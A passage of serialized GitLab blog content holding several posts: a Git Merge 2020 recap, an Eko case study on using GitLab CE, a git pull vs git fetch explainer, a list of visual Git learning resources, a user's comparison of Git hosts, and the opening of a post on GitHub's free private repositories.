}",{"title":2085,"description":2086,"authors":2091,"heroImage":2087,"date":2092,"body":2093,"category":10,"tags":2094},[1392],"2020-03-25","\n\nAlmost 15 years ago [Linus Torvalds](https://www.linkedin.com/in/linustorvalds/) came out of retirement and released a project – Git – that would be adopted by millions who would in turn contribute over time to what is arguably the world's most powerful distributed version control system.\n\n![Git Merge 2020 kicking off](https://about.gitlab.com/images/blogimages/git-merge-2020/Entrance_Git_Merge.gif){: .center}\n\nIn early March, Git was celebrated at [Git Merge 2020](https://git-merge.com/#schedule/), an event that was sponsored by GitHub, GitLab and the [Software Freedom Conservancy (SFC)](https://sfconservancy.org/). A fair share of GitLab team members attended and actively participated in the birthday celebration. We thought we'd share a look at what we liked most.\n\n![Happy birthday Git](https://about.gitlab.com/images/blogimages/git-merge-2020/15_years_of_Git.jpg){: .shadow.medium.center}\n\n## Git police, stop! Open that trunk\n\nThere were lots of bad jokes like that one, but fortunately the content was much better than the jokes. Our users often say the one thing they like about GitLab is it makes Git understandable to them. It's nice to have validation every now and then and that is precisely what we felt during the talk titled **The Zen of Git** in which [Tianyu Pu](https://twitter.com/tianyupu), a software developer at Booking.com, explained in beautifully crafted slides how Git's internals work. By knowing how Git works she is able to approach Git less fearfully and be more productive using it in a day-to-day workflow. Judging by the warm round of applauses received when she finished her talk, we would argue she definitely achieved her goal. The clarity with which she presented each concept was encouraging so we suggest reading through [her deck](https://speakerdeck.com/tianyupu/the-zen-of-git).\n\n![Git 15 year life](https://about.gitlab.com/images/blogimages/git-merge-2020/Git_timeline.jpg){: .shadow.medium.center}\n\n[Ed Thomson](https://twitter.com/ethomson), co-maintainer of libgit2 and a GitHub employee, received some laughter from the audience the minute he was up on stage. His talk was about how lightweight, short-living branches merged fast into trunk – or master, as you wish (more terrible jokes!). He outlined great ideas to keep some sanity in your development branching model. To make this even more compelling, why not a Git workflow alignment chart?\n\n![Ed Thomson's Git workflow alignment chart](https://about.gitlab.com/images/blogimages/git-merge-2020/Git-workflow-alignment-chart.png){: .shadow.medium.center}\n\nEd suggested that pairing this pattern with [continuous delivery practices](/topics/continuous-delivery/) would make a perfect combo. Git flow, however, didn’t get the best of Ed's talk but it is noteworthy that Git flow’s author [Vincent Driessen](https://twitter.com/nvie) shared some timely advice [on his blog](https://nvie.com/posts/a-successful-git-branching-model/) while Git Merge was taking place:\n\n> If your team is doing continuous delivery of software, I would suggest to\n> adopt a much simpler workflow instead of trying to\n> shoehorn git-flow into your team.\n\nBut if there was a star that day, it certainly was [Derrick Stolee](https://twitter.com/stolee?lang=en) from Microsoft. Derrick and his team have recently released [Scalar](https://devblogs.microsoft.com/devops/introducing-scalar/). Barebones Git or Git in combination with the VFS protocol can still struggle when handling large repos like the one hosting Windows' source code. Scalar is an open source project aimed at accelerating Git's workflow regardless of the size of the repos.\n\nI asked Derrick how he and his team combined the request from his employer Microsoft and the larger goals of the Git community which may not be in alignment. For him the answer is simple: Microsoft thinks of Scalar as a good solution for clients and internal teams. The company believes giving Scalar to Git will only make it better since most of the community members are Git veterans and will be able to improve the feature. When designing Scalar Derrick's team always had Git's architecture in mind and the plan is to contribute it to [Git's client](https://devblogs.microsoft.com/devops/introducing-scalar/#git-future). I believe this speaks volumes about Derrick's team's ability to solve a complex problem but also at the same time care about the larger community and Git's design. This is just one example of how enterprises and the larger Git community are getting together and making Git perform better and in more use cases.\n\nAnd Scalar does not only just apply to Window's repo, Office's repo or video game repos. It is having a real-world and timely impact. This [repo](https://github.com/FoldingAtHome/coronavirus/issues/41#issuecomment-602186402) that is collecting real-time datasets to help with the COVID-19 pandemic is getting bigger every minute thanks to the input that many, including [some GitLab teams](https://about.gitlab.com/handbook/engineering/#foldinghome-and-covid-19), are offering. However, it needs technology like Scalar to handle it. \n\nAt the end of our chat Derrick asked me if I knew about the Japanese principle of [Ikigai](https://en.wikipedia.org/wiki/Ikigai):\n\n> Try to find something for your professional career that is fulfilling, something you are good at, something the world needs and something you'll get paid for.\n\nIt's true that contributing features to Git that are useful in such dire times must be a reason to be part of the Git community.\n\n## Work in the open: companies collaborating for the good of Git\n\nScalar isn't the only recent addition to Git – Partial Clone was contributed to Git by [Jeff Hostetler](https://twitter.com/jeffhostetler) from Microsoft and Jonathan Tan from Google. In Derrick's opinion, both of them came from different perspectives to solve the same problem. Had they not collaborated on their approach – even with the community's input – they wouldn't have arrived at the same successful feature that Partial Clone is now. Another very recent example of this same collaboration is some of the updates [Git v2.26 comes with](https://raw.githubusercontent.com/git/git/master/Documentation/RelNotes/2.26.0.txt). And [Peff](https://github.com/peff) from GitHub and [Christian Couder](https://gitlab.com/chriscool) from GitLab contributed changes to the way Git handles packfiles.\n\n## GitLab experts all over: to 15 more years!\n\nOverall we found a lot of validation in GitLab's own work, not only upstream to Git with new features like the ones already mentioned, but also downstream to our users. GitLab gets better at making Git more easily usable and proposes development workflows, like [GitLab Flow](https://docs.gitlab.com/ee/topics/gitlab_flow.html), that allow our users to be fast and productive while keeping a neat code base. GitLab is making [Partial Clone](https://about.gitlab.com/blog/partial-clone-for-massive-repositories/) progressively more stable across any GitLab instance. (If you are already using partial clone, or would like to help us test partial clone on a large project, please get in touch with [James Ramsay](mailto:jramsay@gitlab.com), the group manager, product for Create at GitLab, me [Jordi Mon](mailto:jmon@gitlab.com) or your account manager.)\n\n![GitLab team having fun](https://about.gitlab.com/images/blogimages/git-merge-2020/GitLab_working_together.jpg){: .shadow.medium.center}\n\nWhile our very own [James Ramsay](https://gitlab.com/jramsay) participated in an expert panel in [last year's event](https://github.blog/wp-content/uploads/2019/02/190201_GithubBrussels2019_0330.jpg?resize=1024%2C683?w=1024), this year [Zeger-Jan van de Weg](https://gitlab.com/zj-gitlab) was on stage for a stump the experts panel.\n\n{::options parse_block_html=\"false\" /}\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">\u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a>’s \u003Ca href=\"https://twitter.com/ZJvandeWeg?ref_src=twsrc%5Etfw\">@ZJvandeWeg\u003C/a> on a stump the experts panel at \u003Ca href=\"https://twitter.com/hashtag/GitMerge?src=hash&amp;ref_src=twsrc%5Etfw\">#GitMerge\u003C/a> \u003Ca href=\"https://t.co/jfgC5ZxzWa\">pic.twitter.com/jfgC5ZxzWa\u003C/a>\u003C/p>&mdash; Ray Paik (@rspaik) \u003Ca href=\"https://twitter.com/rspaik/status/1235333465203183618?ref_src=twsrc%5Etfw\">March 4, 2020\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\n\u003Cdiv class=\"center\">\n\n\u003Cblockquote class=\"twitter-tweet\">\u003Cp lang=\"en\" dir=\"ltr\">Had a great time meeting Git community members at \u003Ca href=\"https://twitter.com/hashtag/GitMerge?src=hash&amp;ref_src=twsrc%5Etfw\">#GitMerge\u003C/a> 2020 yesterday! It was awesome being there as part of the \u003Ca href=\"https://twitter.com/gitlab?ref_src=twsrc%5Etfw\">@gitlab\u003C/a> team and coming together with folk from \u003Ca href=\"https://twitter.com/github?ref_src=twsrc%5Etfw\">@github\u003C/a> \u003Ca href=\"https://twitter.com/Google?ref_src=twsrc%5Etfw\">@Google\u003C/a> \u003Ca href=\"https://twitter.com/conservancy?ref_src=twsrc%5Etfw\">@conservancy\u003C/a>, and many others, to collaborate and then celebrate Git’s upcoming 15th anniversary! \u003Ca href=\"https://t.co/crXr6iT5qI\">pic.twitter.com/crXr6iT5qI\u003C/a>\u003C/p>&mdash; Nuritzi Sanchez (@1nuritzi) \u003Ca href=\"https://twitter.com/1nuritzi/status/1235655639554117637?ref_src=twsrc%5Etfw\">March 5, 2020\u003C/a>\u003C/blockquote> \u003Cscript async src=\"https://platform.twitter.com/widgets.js\" charset=\"utf-8\">\u003C/script>\n\n\u003C/div>\n\nMingling around with the rest of the community was hands down the best part of Git Merge 2020. It was so much fun to be part of a welcoming, inclusive community.\n\n![GitLab's team having fun](https://about.gitlab.com/images/blogimages/git-merge-2020/GitLab_team_chilling_out.jpg){: .shadow.medium.center}\n\nFor all these reasons and more we would love our involvement to be ever-growing with Git Merge. That's why we look forward to Git Merge 2021! 15 years have passed and Git is still in its best moment.\n",[277,751,9],{"slug":2096,"featured":6,"template":689},"git-merge-fifteen-year-git-party","content:en-us:blog:git-merge-fifteen-year-git-party.yml","Git Merge Fifteen Year Git Party","en-us/blog/git-merge-fifteen-year-git-party.yml","en-us/blog/git-merge-fifteen-year-git-party",{"_path":2102,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2103,"content":2108,"config":2115,"_id":2117,"_type":14,"title":2118,"_source":16,"_file":2119,"_stem":2120,"_extension":19},"/en-us/blog/git-not-just-for-developers",{"title":2104,"description":2105,"ogTitle":2104,"ogDescription":2105,"noIndex":6,"ogImage":900,"ogUrl":2106,"ogSiteName":673,"ogType":674,"canonicalUrls":2106,"schema":2107},"Git: Not just for developers","How one company helps video editors, developers, and project managers to collaborate on interactive video, by leveraging the power of open source.","https://about.gitlab.com/blog/git-not-just-for-developers","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git: Not just for developers\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Opher Vishnia\"},{\"@type\":\"Person\",\"name\":\"Roy Taragan\"}],\n        \"datePublished\": \"2018-05-24\",\n      }",{"title":2104,"description":2105,"authors":2109,"heroImage":900,"date":2112,"body":2113,"category":10,"tags":2114},[2110,2111],"Opher Vishnia","Roy Taragan","2018-05-24","\nIn this post I’d like to tell you about how, at [Eko](https://helloeko.com/), we’re using GitLab CE to allow professionals from different disciplines, such as video editors, designers, and software engineers, to collaborate on creating and publishing Interactive Video projects using the Eko platform.\n\nEko is a unique company. I know practically every company says that about itself, but for us that’s doubly true in that both our platform as well as our users, and our users of users, take part and actively contribute to creative, experimental ideas and technology. At the core of what we do is an exciting new medium called Interactive Video, which enhances storytelling by bridging the gap between the creator and the viewer. The projects themselves are somewhere between a TV show and a video game. These embody a range of creativity - from the [official music video for Bob Dylan’s “Like a Rolling Stone,”](https://helloeko.com/mindblown/beats-and-rhymes?publisherID=gitlab) through choose-your-own-adventure style comedies and high-caliber movie studio productions like #WarGames.\n\n[![Bob Dylan's Like a Rolling Stone video](https://about.gitlab.com/images/blogimages/eko_mind_blown.png)](https://helloeko.com/mindblown/beats-and-rhymes?publisherID=gitlab)\n\nOur development body creates all the technology for both viewing and authoring these experiences, which are created by small indies as well as big studios and production houses. At the end of the day though, all of these projects, regardless of whether they’re playing on desktop, mobile, or the Xbox, are built with web technologies and run in a browser. Each project is served as a web app, consisting of HTML, JavaScript and CSS files, as well as its video, audio and image assets.\n\nTo create these projects, Eko offers a web-based, drag-and-drop interface called Eko Studio. This software provides project creators with an easy interface for uploading and assembling video, connecting the different videos to each other, creating GUI to define the underlying creativity and finally publishing the finished product.\n\n![Eko Studio](https://about.gitlab.com/images/blogimages/eko-guest-post/eko-studio.png)\n\nIn cases where extra logic and functionality is required, such that isn’t yet covered by the set of features in Eko Studio, we offer the Eko SDK, which enables developers to extend the Studio’s functionality by writing their own custom JS and CSS code.\n\nThe interesting thing about the creation process of our Interactive Video projects is because of their scope and multi-disciplinary nature, different people with different roles all work on the same project at the same time. For example, a video editor might upload a new scene, a project manager would change the SEO copy and a developer might implement new GUI or functionality. One of the challenges we faced at Eko is that all of this needs to be synchronised and shared by all. The experience needs to be fluid and cohesive for all types of users, regardless of their role.\n\n![Eko Studio commits](https://about.gitlab.com/images/blogimages/eko-guest-post/eko-studio-commits.png)\n\n## Using open source to enable collaboration\n\nSo what type of software allows for multiple people to work on the same project without stepping on each other’s toes? Git, of course! With that in mind we set out to find how can we use Git as a backend that could serve our creators, developers and non-developers alike.\n\nIn Eko Studio, users can activate the feature that allows extending a project with code. Behind the scenes, the studio then employs GitLab’s API to create a new repository, generates all the code reflecting the current state of the project, and pushes it as the *initial commit*. From this point forward, each time a preview or published version of the project is generated, the process will begin by first pulling the latest version of the code from the repo. Using GitLab’s webhook for push events combined with Firebase, any time a commit is pushed to the repository, the user in Eko Studio is notified and the UI is updated accordingly. The user in Eko Studio can see all the commits (also fetched using the GitLab API) listed as versions, and can revert to an earlier version.\n\n>The less tech-savvy users aren’t even fully aware that by editing the project or adding content they are in fact publishing commits in the project repo\n\nThe cool thing here though, is that the Eko Studio itself acts as a Git client behind the scenes. The less tech-savvy users aren’t even fully aware that by editing the project or adding content they are in fact publishing commits in the project repo. The studio interface makes this completely transparent for them. Changes to the project made in Eko Studio are translated into Git commits in the project repo. Over on the dev side though, the software engineers use the Git interface itself using their favorite code editor and Git client.\n\n![Eko Studio code panel](https://about.gitlab.com/images/blogimages/eko-guest-post/eko-studio-code-panel.png)\n\nThe fact that GitLab is open source enabled us to custom tailor a solution for our users with minimal changes, leveraging APIs and webhooks to connect our own infrastructure. The readily available AMI meant that we can easily spool up our own GitLab CE instances without a complicated setup process. While our use case is very specific, the fact we’ve been able to use GitLab CE with minimal effort to implement our platform and tools for creating Interactive Video definitely highlights the flexibility and capabilities of GitLab!\n",[751,779,9],{"slug":2116,"featured":6,"template":689},"git-not-just-for-developers","content:en-us:blog:git-not-just-for-developers.yml","Git Not Just For Developers","en-us/blog/git-not-just-for-developers.yml","en-us/blog/git-not-just-for-developers",{"_path":2122,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2123,"content":2128,"config":2133,"_id":2135,"_type":14,"title":2136,"_source":16,"_file":2137,"_stem":2138,"_extension":19},"/en-us/blog/git-pull-vs-git-fetch-whats-the-difference",{"title":2124,"description":2125,"ogTitle":2124,"ogDescription":2125,"noIndex":6,"ogImage":2047,"ogUrl":2126,"ogSiteName":673,"ogType":674,"canonicalUrls":2126,"schema":2127},"Git pull vs. git fetch: What's the difference? ","Git pull is a Git command that performs both git fetch and git merge simultaneously. This article outlines the characteristics and appropriate uses of each.","https://about.gitlab.com/blog/git-pull-vs-git-fetch-whats-the-difference","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git pull vs. git fetch: What's the difference? \",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"GitLab\"}],\n        \"datePublished\": \"2024-09-24\",\n      }",{"title":2124,"description":2125,"authors":2129,"heroImage":2047,"date":2130,"body":2131,"category":10,"tags":2132},[970],"2024-09-24","The Git command is very popular as a [distributed version control system](https://about.gitlab.com/topics/version-control/benefits-distributed-version-control-system/) and is used when synchronization with a remote repository is necessary. The developer needs to choose the appropriate commands based on the project's needs. In this article, we will explain the basics and differences between git fetch and git pull, and provide a detailed explanation of their respective use cases. \n\nTable of contents \n- [Git fetch and git pull basics](#git-fetch-and-git-pull-basics)\n- [What is git fetch?](#what-is-git-fetch%3F)\n- [What is git pull?](#what-is-git-pull%3F)\n- [When to use git fetch](#when-to-use-git-fetch)\n- [When to use git pull](#when-to-use-git-pull)\n- [Git fetch and git pull FAQs](#git-fetch-and-git-pull-faqs)\n\n## Git fetch and git pull basics \n\nGit fetch and git pull are both Git commands used to retrieve update information from a remote repository. So, how do they differ? Git fetch downloads the changes from the remote repository to the local repository but does not make any changes to the current working directory. Since the changes are not merged into the local branch, you can check the changes from the remote repository without interrupting your current work. On the other hand, git pull retrieves the latest changes from the remote repository like git fetch, but it also automatically merges those changes into the current branch. In contrast to git fetch, git pull directly applies the changes from the remote repository to the local working directory.\n\n## What is git fetch? \nThe git fetch command retrieves the latest commit history from the remote repository, but it does not affect the local working directory. Even after fetching remote changes, they are not reflected in the local branch. It is primarily used when you want to retrieve the latest status from the remote repository and review the changes before they are reflected in the local repository. To apply the retrieved changes to the local branch, you need to manually run git merge or [git rebase](https://docs.gitlab.com/ee/topics/git/git_rebase.html).\n\n## What is git pull? \nThe git pull command combines `git fetch` and `git merge` (or `git rebase`) into a single command. This allows you to fetch changes from the remote repository and automatically integrate them into the current local branch. \n\nWhile git fetch retrieves changes from the remote repository without applying them to the local branch, running git pull automatically integrates the changes from the remote repository into the local branch. \n\nGit pull is suitable for quickly reflecting remote changes in the local branch, but it can lead to conflicts, so caution is needed, especially when working with multiple people. \n\n## When to use git fetch \nGit fetch is a command used to retrieve the latest information from a remote repository. The retrieved information is not directly reflected in the local branch. Using git pull will reflect all remote branches, including incorrect or problematic ones, in the local branch. \n\nWhen changes are made simultaneously on both remote and local branches, or when there are new users on the team, it is safer to use git fetch to retrieve the remote branch contents first and then perform merge or rebase. \n\n## When to use git pull \nGit pull is a command that performs more processes compared to git fetch. Git pull can perform both git fetch and additionally execute git merge or git rebase. For this reason, git pull is recommended when you want to quickly reflect changes from the remote repository in the local branch. \n\n## Git fetch and git pull FAQs\n\n### What is the difference between git pull and git fetch? \nGit pull is a command that performs git fetch followed by git merge or git rebase. While git fetch does not affect the local repository, git pull automatically synchronizes changes from the remote repository with the local repository. \n\n### What precautions should be taken when using git pull? \nWhen executing git pull, there may be conflicts between remote and local changes. Merge conflicts are particularly likely to occur, so if conflicts arise, they need to be resolved manually. Additionally, using git pull --rebase allows you to incorporate the latest changes while performing a rebase. \n\n### What is git fetch used for? \nGit fetch is useful for checking and retrieving the latest status of the remote repository. However, the changes retrieved are not automatically reflected in the local branch; git fetch is used to synchronize the local and remote repositories. \n\n## Read more\n- [What's new in Git 2.46](https://about.gitlab.com/blog/whats-new-in-git-2-46-0/)\n- [Learn Git](https://docs.gitlab.com/ee/topics/git/)\n- [Learn about GitLab Gitaly](https://docs.gitlab.com/ee/administration/gitaly/)",[751,9],{"slug":2134,"featured":6,"template":689},"git-pull-vs-git-fetch-whats-the-difference","content:en-us:blog:git-pull-vs-git-fetch-whats-the-difference.yml","Git Pull Vs Git Fetch Whats The Difference","en-us/blog/git-pull-vs-git-fetch-whats-the-difference.yml","en-us/blog/git-pull-vs-git-fetch-whats-the-difference",{"_path":2140,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2141,"content":2147,"config":2153,"_id":2155,"_type":14,"title":2156,"_source":16,"_file":2157,"_stem":2158,"_extension":19},"/en-us/blog/git-resources-for-visual-learners",{"title":2142,"description":2143,"ogTitle":2142,"ogDescription":2143,"noIndex":6,"ogImage":2144,"ogUrl":2145,"ogSiteName":673,"ogType":674,"canonicalUrls":2145,"schema":2146},"5 Git resources for visual learners","Learning Git is not commonplace in code instruction, yet it is essential for modern software development. These sites get you started.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749668161/Blog/Hero%20Images/armycyberschool.jpg","https://about.gitlab.com/blog/git-resources-for-visual-learners","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"5 Git resources for visual learners\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"PJ Metz\"}],\n        \"datePublished\": \"2022-09-14\",\n      }",{"title":2142,"description":2143,"authors":2148,"heroImage":2144,"date":2150,"body":2151,"category":10,"tags":2152},[2149],"PJ Metz","2022-09-14","\n[Git](https://Git-scm.com/doc) is free and open source version control and has become the industry standard for keeping track of changes in software. A recent [survey](https://www.jetbrains.com/lp/devecosystem-2021/) by JetBrains states that 93% of developers surveyed use Git for source control.  Even though it’s used by almost every software developer, it’s still not ubiquitously taught as part of coding courses. Many people end up learning Git either on the job or on their own.\n\nWe’ve gathered a list of sites to learn Git, whether you’re brand-new to it or you need to fine-tune your skills. These five resources are largely focused on visual learning and use either video-based tools or an interactive website or game. \n\n\n**1. [Oh My Git](https://ohmyGit.org/)**\n\nOh My Git is a gamified way of learning Git commands that includes a visualization of what effect your actions have on the repository. It’s card-based for early beginners. Think of it like Hearthstone or Magic the Gathering, but better for learning. It can also be played by using the command line as well. Start playing today! \n\n**2. [Git for Computer Scientists](https://eagain.net/articles/git-for-computer-scientists/)**\n\nI love the abstract for this site: “Quick introduction to Git internals for people who are not scared by words like Directed Acyclic Graph.” This website has lots of helpful graphs for people who aren’t necessarily working explicitly in software, and is intended for a specific audience of computer scientists; be aware before heading in. \n\n**3. [Learn Git Branching](https://Github.com/pcottle/learnGitBranching#learnGitbranching)**\n\nSometimes, the complicated part of Git is understanding what is actually happening when you’re creating or working with multiple branches. This visualization tool helpfully creates a real-time display of changes to commit trees. \n\n**4. [Explain Git with D3](https://onlywei.github.io/explain-git-with-d3/)**\n\nThis is such a great resource and one that everyone should have bookmarked. This website lets you type commands in a CLI and immediately see graphs representing what you did on the right. It has an open playground mode where you can just do whatever you like as well as structured lessons for common Git commands. If you use Git but it just feels like magic, then this is a great website for deepening your understanding of what Git does. \n\n**5. [Git for ages 4 and up](https://youtu.be/1ffBJ4sVUb4?t=125)**\n\nThis is a fantastic video of Michael G. Schwern at Linux conf.au in 2013. Using children's toys, Michael gives us a great example of what exactly goes on in Git. It’s an entertaining video with important basics and concepts for anyone struggling to understand Git. \n\n\u003C!-- blank line -->\n\u003Cfigure class=\"video_container\">\n  \u003Ciframe src=\"https://www.youtube.com/embed/1ffBJ4sVUb4\" frameborder=\"0\" allowfullscreen=\"true\"> \u003C/iframe>\n\u003C/figure>\n\u003C!-- blank line -->\n\n## Did you know? \n\nGitLab offers free Ultimate tier licenses to qualifying educational institutions when used for learning, teaching, or research? Learn more [here](/solutions/education/).\n",[751,9,267],{"slug":2154,"featured":6,"template":689},"git-resources-for-visual-learners","content:en-us:blog:git-resources-for-visual-learners.yml","Git Resources For Visual Learners","en-us/blog/git-resources-for-visual-learners.yml","en-us/blog/git-resources-for-visual-learners",{"_path":2160,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2161,"content":2167,"config":2173,"_id":2175,"_type":14,"title":2176,"_source":16,"_file":2177,"_stem":2178,"_extension":19},"/en-us/blog/git-wars-switching-to-gitlab",{"title":2162,"description":2163,"ogTitle":2162,"ogDescription":2163,"noIndex":6,"ogImage":2164,"ogUrl":2165,"ogSiteName":673,"ogType":674,"canonicalUrls":2165,"schema":2166},"Git Wars: Why I'm switching to GitLab","New GitLab user Christopher Watson puts us through our paces and weighs up his Git hosting options.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1749680411/Blog/Hero%20Images/git-wars-switching-to-gitlab.jpg","https://about.gitlab.com/blog/git-wars-switching-to-gitlab","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"Git Wars: Why I'm switching to GitLab\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Christopher Watson\"}],\n        \"datePublished\": \"2017-07-19\",\n      }",{"title":2162,"description":2163,"authors":2168,"heroImage":2164,"date":2170,"body":2171,"category":801,"tags":2172},[2169],"Christopher Watson","2017-07-19","\n\nIt’s a well-known fact: GitHub has the market share when it comes to Git hosting, with Bitbucket following close behind due to their “unlimited private repositories” policy. But what if I told you that those weren’t your only options?\n\n\u003C!-- more -->\n\nNow I have nothing against GitHub. It’s a great tool and I’ve been using it for years. It’s built primarily in a framework I love, Ruby on Rails, and its design is one we’ve all come to tolerate (if not love). With GitHub controlling most of the market share, most open source projects have also found a home there.\n\nAll of this being said, I’d be lying if I said that GitHub didn’t have its downsides. If you want private repositories, it’s going to cost you a pretty penny at $25 per month for your first five users, and then $9 per user after that. For comparison's sake, if you have 10 users in your organization it’s going to cost you $80 a month, and that’s a pretty small team. GitHub also has a sordid history when it comes to communicating with the community, implementing new features, and updating its somewhat dated look.\n\nBitbucket is another beast altogether. Created by the tech conglomerate Atlassian, Bitbucket is their answer to GitHub. Its claim to fame is that you can have unlimited private repositories for free…as long as your team has no more than five people.\n\nThis is actually the reason I first started using Bitbucket. However, if you do have more than five people, you’re going to pay, and the quality that you pay for isn’t all that great. I’ve worked on a number of projects on Bitbucket where my team was plagued by slow pulls/pushes, 503 errors when attempting to view a repo, and just overall jankyness. Besides that, their design also leaves a lot to be desired. The new design looks better, but also somehow makes things even more confusing (someone needs to learn the difference between UI and UX). To be completely honest I don’t have anything good to say about Bitbucket, so I’m going to continue.\n\n### So what’s this GitLab thing? Is it the answer to all of our Git hosting woes?\n\nWell yes and no. GitLab is a very good product, but it’s not perfect. It certainly isn’t as fast as GitHub when it comes to pushing and pulling repos. That being said, here are my reasons for switching to GitLab for my personal projects: GitLab is a Git hosting solution with a very large toolset and, objectively, a beautifully designed website (could it still use some work? Yes, but I digress). It is completely free for unlimited users, unlimited private repositories, and full access to most of the awesome features they provide.\n\nYes, they still have paid tiers for the [enterprise](/enterprise/). You can’t expect them to keep an awesome project like this going without some kind of monetization, but for us little guys you’ll most likely never have to pay. That has got to be music to your ears.\n\n### So you said it has “awesome features.” To what are you referring?\n\nWell, there’s quite a list. Let’s take a look:\n\n1. **Syntax themes!** In case you didn’t get that, I’ll say it again: syntax themes! This has been something that I have been waiting a long time for GitHub to come out with, but GitLab beat them to the punch. We’re still probably a long way away from having custom themes, but the ability to have a dark theme when checking diffs in the browser is awesome.\n\n1. **Registry:** GitLab also has a built-in Docker registry for your projects. This is an amazingly powerful feature for those that want to keep their containers off of the public registry at hub.docker.com, but don’t want to pay for a private service.\n\n1. **Pipelines/GitLab CI:** Continuous integration is a huge time saver and a great way to make sure a pull request isn’t going to break your app. GitLab saves you from having to use an external CI service by having their own CI built right in. Not to say you can’t use an external CI if you want; GitLab has integrations for Jenkins, Bamboo, and much more.\n\n1. **3rd Party Integrations:** As mentioned above, GitLab has 3rd party integrations for several services such as CI, code coverage, messaging, etc. Their Slack integration is great for notifying your team when stuff has been merged into master. I will be honest though, I am sure GitHub has more integrations.\n\n1. **All the features that make GitHub great:** GitLab also ships with Wikis, Markdown-based readmes, etc. You don’t really lose any features by switching, but you gain a ton.\n\n![screengrab](https://about.gitlab.com/images/blogimages/git-wars-2.png){: .shadow}\u003Cbr>\n\n### So if it’s so great, why isn’t everyone using it?\n\nThere are a couple of answers to that question. First off, you have the market share factor. GitHub was one of the first Git hosting providers to market and they’ve managed to hold onto that. That means that if you want people to contribute to your project, it helps to have it on GitHub because chances are the people that you want to contribute have an account.\n\nThe other answer is related. Comfortability. People are simply comfortable with the tool they know and a lot of people aren’t like me (willing to throw everything out the window because I truly believe that the better product should get my business). This is the same reason so many people are still using Atlassian products. It’s definitely not because of their user interfaces.\n\n### So where should I go from here?\n\nThat depends on you. If you’re comfortable getting to know a new way of doing things, I’d suggest you take a look at GitLab. It really is worth the time you’ll put into it.\n\nIf you’re already *comfortable* then go ahead and stick with what you know, but at least now you know that there are alternatives.\n\n## About the Author\n\n[Chris Watson](https://twitter.com/idev0urer) is a freelance full-stack developer who occasionally enjoys sharing some of his many opinions with the world. He and his wife currently reside in sunny Arizona.\n\n_This post was originally published on [blog.cwatsondev.com](https://blog.cwatsondev.com/git-wars-why-im-switching-to-gitlab/)._\n\n“[paper battle](https://www.flickr.com/photos/die_ani/9024130/)” by [anika](https://www.flickr.com/photos/die_ani/) is licensed under [CC0 1.0](https://creativecommons.org/publicdomain/zero/1.0/)\n{: .note}\n",[751,9,910],{"slug":2174,"featured":6,"template":689},"git-wars-switching-to-gitlab","content:en-us:blog:git-wars-switching-to-gitlab.yml","Git Wars Switching To Gitlab","en-us/blog/git-wars-switching-to-gitlab.yml","en-us/blog/git-wars-switching-to-gitlab",{"_path":2180,"_dir":244,"_draft":6,"_partial":6,"_locale":7,"seo":2181,"content":2186,"config":2192,"_id":2194,"_type":14,"title":2195,"_source":16,"_file":2196,"_stem":2197,"_extension":19},"/en-us/blog/github-offering-free-private-repos-for-up-to-three-collaborators",{"title":2182,"description":2183,"ogTitle":2182,"ogDescription":2183,"noIndex":6,"ogImage":2028,"ogUrl":2184,"ogSiteName":673,"ogType":674,"canonicalUrls":2184,"schema":2185},"GitHub's free private repos: GitLab's perspective","GitLab's CEO reflects on this move and what it means for the software development space.","https://about.gitlab.com/blog/github-offering-free-private-repos-for-up-to-three-collaborators","\n                        {\n        \"@context\": \"https://schema.org\",\n        \"@type\": \"Article\",\n        \"headline\": \"GitHub now offers free private repos for up to three collaborators – here are our thoughts\",\n        \"author\": [{\"@type\":\"Person\",\"name\":\"Sid Sijbrandij\"}],\n        \"datePublished\": \"2019-01-07\",\n      }",{"title":2187,"description":2183,"authors":2188,"heroImage":2028,"date":2189,"body":2190,"category":299,"tags":2191},"GitHub now offers free private repos for up to three collaborators – here are our thoughts",[1235],"2019-01-07","\nGitHub just launched [free private repos with up to three collaborators](https://blog.github.com/2019-01-07-new-year-new-github/). I like to think that increased competition from us (GitLab) contributed to this change – as one Hacker News commenter stated, [\"Thank you GitLab for providing market competition forcing GitHub to consider this!\"](https://news.ycombinator.com/item?id=18848142)\n\n## Some history\n\nWhen we [originally announced GitLab.com](https://news.ycombinator.com/item?id=4428278) I made the main point that it would have private repos for free. I think it is great for beginner users that private repos on GitHub are now free.\nIf you're starting to program and aren't ready to share your code with the world yet, you don't have to have a paid account to keep it private.\n\nAt the time, I was very disappointed to learn that Bitbucket.org already offered the same. GitLab took off despite that and GitLab.com recently surpassed [10 million projects](https://twitter.com/gitlab/status/1075377374022262784) and in the [top dev tools ranking of Axosoft](https://blog.axosoft.com/top-developer-tools-2019/) GitLab climbed the ranks 4 spots and overtook GitHub for the first year.\n\n## Looking ahead\n\nAt GitLab we think that repositories will become a commodity. I think Microsoft will try to generate more revenue with people using Azure more instead of paying for repos. We're focusing on making a single application for the entire DevOps lifecycle [that can replace a lot of other tools](/competition/). Or, [as Stavros Korokithakis phrased it](https://news.ycombinator.com/item?id=18848066): \"My move to GitLab was basically 'Come for the free repos, stay for the rest of the amazing features.' I will not be moving off it, and my new repos will keep being on GitLab.\"\n\nWe think the long-term trend is [multi-cloud](https://medium.com/gitlab-magazine/multi-cloud-maturity-model-2de185c01dd7) and we'll keep shipping with our [2,200 other 